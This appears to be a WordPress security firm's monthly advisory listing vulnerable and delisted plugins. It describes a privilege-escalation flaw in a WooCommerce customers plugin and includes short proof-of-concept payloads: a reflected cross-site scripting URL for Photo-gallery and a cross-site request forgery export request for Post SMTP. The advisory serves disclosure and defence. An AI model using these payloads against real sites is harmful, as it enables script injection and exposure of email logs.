This article covers our public notifications related to major security issues our clients and the WordPress community should know about. We are always focused on prevention and the mitigation of risk to our clients, and keeping you updated here is part of that process.
List of Vulnerable Plugins, January February
[visualizer id=”22035″ lazy=”no” class=””]
Plugins Removed From WordPress Repository
[visualizer id=”22039″ lazy=”no” class=””]
WordPress security team decides to close a plugin when a security issue is found and the developer doesn’t release a patch in a timely manner. You can read more about this here. If you are using one or more of the above plugins we recommend deactivating them until the developer releases a patch for the mentioned vulnerability or consider a more reliable alternative.
Relevant Vulnerabilities
Woocommerce-customers-manager: | Privilege Escalation Vulnerability |
This month we found and reported a critical vulnerability in this plugin affecting versions <= 26.4. If exploited, any user in the site could become administrator.
Photo-gallery: | Cross-Site Scripting |
Proof Of Concept:
http://vulnsite.com/index.php/bwg_gallery/randomalbumName/?bwg_search_0=%22%20onfocus=%22alert(1)%22%20autofocus=%22
Post SMTP: | Cross-Site Request Forgery |
Proof Of Concept:
GET /wp-admin/admin.php?page=postman_email_log&post-smtp-filter=1&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dpostman_email_log&from_date=&to_date=&search=&postman_page_records=10&postman_export_csv=